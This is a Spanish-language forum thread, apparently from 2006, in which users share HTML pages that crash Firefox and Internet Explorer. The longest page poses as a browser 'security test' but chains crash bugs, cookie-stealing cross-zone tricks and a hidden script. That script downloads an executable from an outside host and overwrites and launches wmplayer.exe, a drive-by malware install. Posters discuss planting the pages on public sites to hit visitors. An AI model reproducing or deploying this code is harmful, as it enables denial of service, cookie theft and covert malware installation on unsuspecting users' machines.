Se kejaban de que internet explorer 7 ya tenia una vulnerabilidad desde el primer dia de lanzamiento, pues no es tan grave como esta de firefox que es de DOS.... para que les cierren el firefox a los lamers xD
Quote
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<script type="text/javascript">
function do_crash()
{
var range;
range = document.createRange();
range.selectNode(document.firstChild);
range.createContextualFragment('<span></span>');
}
</script>
</head>
<body onload="do_crash()">
<p>Adios Firefox xD!</p>
</body>
</html>
Quien creo ese script??? Yo nego uno q si usas IE se te freeza la PC y tienes q darle restart
psss ponlo ;D
me gustaria trabar algunas pc's ;D
saludos
Si ponlo pero por ejemplo ese q posteo TheJez q haces con el?? como lo utilisas?
Quote from: · M¥$têR¥øU§³ ƒ34R ·º¹ on November 02, 2006, 01:11:51 PM
Si ponlo pero por ejemplo ese q posteo TheJez q haces con el?? como lo utilisas?
Bueno este script lo creo el Clan de Izhal y fue un caos en sus tiempos xD
como funciona??? Sencillo solo subelo algun servidor con extencion htm o html o shtml
<html>
<head>
<link rel="fontdef" src="crash47.pfr">
<style type="text/css">
#crash {position: absolute;}
</style>
<script language="javascript">
while (true) {
try {
pattern = new RegExp("(a?)b(\\1{2})+c","g");
text = "bc";
match = pattern.test(text);
} catch(exception) {
}
}
</script>
<title>Pantalla Azul</title>
</head>
<p> </p>
<p><center><h1>Testeando tu sistema..</h1></center></p>
<blockquote><p> </p>
Este test utiliza unos cuantos bugs para ver si tu navegador y tu sistema operativo estan actualizados y son seguros.
Si te sale una pantalla azul o te da algun error, deberías actualizar el navegador lo antes posible.
<br><br>
Intentando con/con crash (various Windows)...
<img SRC="file://c:/con/con">
Superado<br><br>
Ejecutando invalid JPEG Crash (NS 4.5+)...
<img src="http://24.163.47.118/lolpics/crash-netscape.jpg">
Superado<br><br>
Probando bewm! Crash (NS 4.7)...
<font face="arial black, arial,san serif" size=5>bewm!@#$</font>
Superado<br><br>
Intentando bewm!2 Crash (NS 4.5)...
<div id="crash">
<table width=23% height=23%><tr><td>
bewm!@#$</b>
</td></tr></table>
</div>Superado<br><br>
<SPAN STYLE="position:absolute; LEFT:0">
<TABLE BORDER="0" WIDTH=100%><TR><TD><TABLE><TR><TD></TD></TR><TR><TD>
<TABLE><TR><TD></TD></TR></TABLE></TD></TR></TABLE></TD></TR></TABLE></SPAN>Superado<br><br>
Intento de crash IE 5.x-6 (aportado por shap)
<IMG src="::" onError="this.src='::';">
Trying Internal Parser Crash (NS 4.04+)...
Superado
<br><br>
Probando JS Crash (IE 5.5, etc)...
<iframe id=emarf></iframe>
<script>
tcejbo = {};
emarf.document.open();
emarf.document.write("<s"+"cript>top.tcejbo.emarf=0</s"+"cript>");
delete tcejbo;
tcejbo = {};
</script>
Superado<br><br>
Intentando ejecutar NetBunny's Big Form Crash (IE5)...
<table>
<tr>
<td width="1%"><FORM method="POST">
<input type="text" name="crash" size="999999999999999999999999999999..." maxlength="9999999999999999999999999..." value="crash"></td>
</tr>
</table>
Superado<br><br>
Probando IMG Width Crash (some IE)...
<img width=0000000000...000000001>
Superado<br><br>
Probando ClassID Crash (IE)...
<OBJECT CLASSID=file://0000004000..00000400000000000></OBJECT>
Superado<br><br>
<p>Intentando EMBED SRC Crash (IE 4.0)...
<EMBED SRC="http://C|/A.0000000000000...0000000000">
Superado<br><br>
Ejecutando Object Data Loop Crash (various o/s)...
<object data="guerra.shtml"></object>
Superado<br><br>
Intentando flash crash (IE 5+)...
<SCRIPT>
var color = new Array;
color[1] = "white";
color[2] = "white";
for(x = 0; x <3; x++)
{
document.bgColor = color[x]
if(x == 2)
{
x = 0;
}
}
</SCRIPT>
Superado<br><br>
Intentando ejecutar Self Referenced Frames Crash
<FRAMESET ROWS = 50%,50%>
<FRAME SRC = "guerra.shtml">
<FRAME SRC = "guerra.shtml">
</FRAMESET>
Superado<br><br>
Varios bugs más..
<iframe src="irc://irc.netshock.st:6667/izhal"><iframe src="irc://irc.netshock.st:6667/izhal"><iframe src="irc://irc.netshock.st:6667/izhal"><iframe src="irc://irc.netshock.st:6667/izhal">
<iframe src="irc://irc.netshock.st:6667/izhal"><iframe src="irc://irc.netshock.st:6667/izhal"><iframe src="irc://irc.netshock.st:6667/izhal"><iframe src="irc://irc.netshock.st:6667/izhal">
<iframe src="irc://irc.netshock.st:6667/izhal"><iframe src="irc://irc.netshock.st:6667/izhal"><iframe src="irc://irc.netshock.st:6667/izhal"><iframe src="irc://irc.netshock.st:6667/izhal">
<iframe src="irc://irc.netshock.st:6667/izhal"><iframe src="irc://irc.netshock.st:6667/izhal"><iframe src="irc://irc.netshock.st:6667/izhal"><iframe src="irc://irc.netshock.st:6667/izhal">
<p><font size="2">BackMyParent2 BUG</font></p>
<SCRIPT>
FramedPage="http://www.izhal.com/code.php";
window.open("javascript:alert('JPU\\n HTMLCode = \\n'+document.all.tags('HTML')[0].outerHTML)","_search");
alert("cargando JPU..");
w=window.open(FramedPage,"_search");
alert("cargando frame..");
w.frames[0].open("guerra.shtml","_self");
</SCRIPT>
<SCRIPT>
for(i=1;i<=5;i++)
setTimeout("history.back()");
</SCRIPT>
<p><font size="2">NAFjpuInHistory Bug</font></p>
<SCRIPT>
w=window.open("javascript:'JPU :: document.domain = '+document.domain");
alert("cargando JPU..")
w.window.external.NavigateAndFind("http://www.izhal.com/code.php",'e','_top');
alert("cargando frame..");
w.frames[0].location.href="guerra.shtml";;
</SCRIPT>
<p><font size="2">WsFakeSrc Bug</font></p>
<IFRAME ID=myiframe SRC="HTTP://WWW.IZHAL.COM/CODE.PHP"></IFRAME>
<SCRIPT>
w=window.open("http://www.izhal.com/code.php","_search");
alert("cargando izhal.com en iframe");
myiframe.open("javascript:alert(document.body.innerText)","_search");
</SCRIPT>
<p><font size="2">LinkillerSaveRef Bug</font></p>
<SCRIPT>
w=window.open("about:blank","mywin","location=yes resizable=yes width=200 height=100 top=0 left=0");
Ref=w.location.assign;
w.open("C:\\CON\CON\TEXT.TXT","_self");
function HookFn(In)
{
Ref("javascript:alert(document.body.innerText)");
}
document.execCommand("SelectAll");
document.execCommand("CreateLink",false,"http://xxxx");
document.execCommand("UnSelect");
document.body.createTextRange=HookFn;
document.execCommand("CreateLink");
</SCRIPT>
</p>
<p><font size="2">WsBASEjpu Bug</font></p>
<p><A HREF="http://www.izhal.com/code.php" TARGET="_search" ID=vt_LINK>VT!</A><BR>
<A HREF=";" TARGET="_search" ID=jpu_LINK>JPU!</A>
<SCRIPT>
vt_LINK.click();
jpu_LINK.click();
</SCRIPT>
</p>
<p><font size="2">WsOpenFileJPU Bug</font></p>
<SCRIPT>
VtUrl="http://www.izhal.com/code.php";
window.open(VtUrl,"_search");
window.open("file:javascript:alert('document.cookie = '+document.cookie)","_search");
</SCRIPT>
<textarea id="code" style="display:none;">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http://ip3e83566f.speed.planet.nl/1.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);
location.href = "mms://";
</textarea>
Wait a couple of seconds..
<script language="javascript">
function preparecode(code) {
result = '';
lines = code.split(/\r\n/);
for (i=0;i<lines.length;i++) {
line = lines[i];
line = line.replace(/^\s+/,"");
line = line.replace(/\s+$/,"");
line = line.replace(/'/g,"\\'");
line = line.replace(/[\\]/g,"\\\\");
line = line.replace(/[/]/g,"%2f");
if (line != '') {
result += line +'\\r\\n';
}
}
return result;
}
function doit() {
mycode = preparecode(document.all.code.value);
myURL = "file:javascript:eval('" + mycode + "')";
window.open(myURL,"_media");
}
window.open("error.jsp","_media");
setTimeout("doit()", 5000);
</script>
<P>
<img src="http://127.0.0.1/.AAAAA...">
<P>
Tu sistema parece seguro, felicidades.
</body>
</html>
Ahh se me olvido decirles q puede q el Anti-virus lo detecte como virus o malware...
El que postee, frezea el firefox 2 asi como el de internet explorer que puso porq69 ;D
Osea q?.. lo posteo en una paguina q tenga html .. y el q lo vea se freezea el fire fox y demas=.. serviria en una paguina ASpweblinks?... esas aceptan codigo htmal.. como la de www.webironmaden.com esa tiene aspweblinks..(jeje) de hay lo podre meter y pum freezed?
Si lo podes poner... no es mas que un simple contenido de HTML... lo subis y listo!
Esto no es una vulnerabilidad critica ya que es un script que cierra el firefox esto no tiene que ver nada con inyección de código "buffer overflow" o algun tipo de ataque XSS. Para mi no es una vulnerabilidad aunque si debe ser corregida en la próxima versión.
Bueno yo tambien pienso q no es un bug pero bueno... Les queria comentar q yo utilizo un Add-on bastante interesante q me proteje de todo tipo de Script haci q es una forma de protejerse de este tipo de bromas o ataques (como le quieran decir)...
Add-on: NoScripts (http://www.noscript.net/whats)
Aqui les dejo un link para q lo prueben "Eliminado"